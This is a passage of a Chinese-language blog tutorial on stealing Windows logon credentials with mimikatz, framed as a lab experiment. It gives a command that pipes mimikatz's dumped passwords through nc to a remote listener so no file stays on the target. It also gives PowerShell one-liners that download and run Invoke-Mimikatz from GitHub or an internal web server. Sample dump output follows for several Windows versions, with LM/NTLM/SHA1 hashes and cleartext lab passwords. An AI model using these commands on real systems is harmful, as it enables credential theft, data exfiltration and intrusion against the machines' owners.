文章插图
本次实验使用ncat来做消息反弹 , 不知道ncat命令的同学可以参考我的这篇文章:nc命令学习记录
(https://www.sqlsec.com/2019/10/nc.html)
macOS
macOS本机提前做好监听:
ncat -lvp 2333
我本人更喜欢ncat命令多一点 , 具体看个人喜好 。
Windows
这里为了方便我把nc.exe上传到了mimikatz.exe的同目录下了:
C:mimikatz_trunk\x64>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit | nc -v 10.211.55.2 2333
DNS fwd/rev mismatch: GG != GG.lan
GG [10.211.55.2] 2333 (?) open
效果
这样操作完成后 , 即不在目标系统上留下任何文件 , 直接把抓取到的结果用nc发送到指定的远程机 , 此时macOS这边已经拿到返回的密码信息了:
文章插图
powershell加载mimikatz抓取
目标机器可以连接外网的情况下:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
内网的情况下可将脚本下载下来 , 自己搭建一个本地的Web服务器 , 通过内网IP去访问:
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.211.55.2/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
各个系统版本的抓取样本
Windows Server 2003 R2
Authentication Id : 0 ; 420302 (00000000:000669ce)
Session : Interactive from 0
User Name : Administrator
Domain : GG6043
Logon Server : GG6043
Logon Time : 2019-11-18 20:51:21
SID : S-1-5-21-3664143716-1376148344-336540569-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : GG6043
* LM : 896108c0bbf35b5caad3b435b51404ee
* NTLM : f6502cbe4802f94ab472288970c124cd
* SHA1 : 669c9b60b44e10aaa8784563c9a5381c9300235a
wdigest :
* Username : Administrator
* Domain : GG6043
* Password : P@ss123
kerberos :
* Username : Administrator
* Domain : GG6043
* Password : P@ss123
ssp :
credman :
主要有如下的关键信息:
文章插图
Windows Server 2008 R2
Authentication Id : 0 ; 224455 (00000000:00036cc7)
Session : Interactive from 2
User Name : Administrator
Domain : GGF140
Logon Server : GGF140
Logon Time : 2019/11/18 23:32:08
SID : S-1-5-21-3111474477-815050075-712084324-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GGF140
* LM : 921988ba001dc8e14a3b108f3fa6cb6d
* NTLM : e19ccf75ee54e06b06a5907af13cef42
* SHA1 : 9131834cf4378828626b1beccaa5dea2c46f9b63
tspkg :
* Username : Administrator
* Domain : GGF140
* Password : P@ssw0rd
wdigest :
* Username : Administrator
* Domain : GGF140
* Password : P@ssw0rd
kerberos :
* Username : Administrator
* Domain : GGF140
* Password : P@ssw0rd
ssp :
credman :
Windows Server 2008 R2 默认的配置还是可以读取到LM类型的Hash的 , 与网上的理论不符合 , 说明WIndows Server 2008 R2 与Windows 7 依然没有完全禁用掉LM类型的Hash
Windows 7 SP1
Authentication Id : 0 ; 2006207 (00000000:001e9cbf)
Session : Interactive from 2
User Name : Administrator
Domain : GG37BE
Logon Server : GG37BE
Logon Time : 2019/11/18 22:36:13
SID : S-1-5-21-1996198258-1617865379-4184567355-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GG37BE
* LM : 921988ba001dc8e14a3b108f3fa6cb6d
* NTLM : e19ccf75ee54e06b06a5907af13cef42
* SHA1 : 9131834cf4378828626b1beccaa5dea2c46f9b63
tspkg :
* Username : Administrator
* Domain : GG37BE
* Password : P@ssw0rd
wdigest :
* Username : Administrator
* Domain : GG37BE
* Password : P@ssw0rd
kerberos :
* Username : Administrator
* Domain : GG37BE
* Password : P@ssw0rd
【Windows用户密码的加密与破解利用】ssp :
credman :
主要有如下的关键信息:
文章插图
Windows 10 1903
Authentication Id : 0 ; 86025756 (00000000:0520a61c)
Session : Interactive from 9
User Name : sqlsec
Domain : MACBOOKPRO
Logon Server : MACBOOKPRO
Logon Time : 2019/11/18 20:06:24
SID : S-1-5-21-2097287409-4065191294-224695044-1000
msv :
[00000003] Primary
推荐阅读
- 电脑右下角弹窗广告怎么关闭win10?windows10桌面弹出广告?
- 如何永久激活Windows10系统专业版教程
- Windows WDS服务安装配置
- 手把手教你用上更好看的新版 Windows开始菜单
- Windows 10 2004版本如何使用小娜?
- Windows 这些没用的设置,我建议你还是趁早关闭吧
- Windows7固态硬盘卡顿假死怎么办?这个方法照做就能轻松解决
- 网络性能debug参数整理
- 人力资源|藏在裁员大数据中的企业密码
- 量子密码技术 量子密码的安全性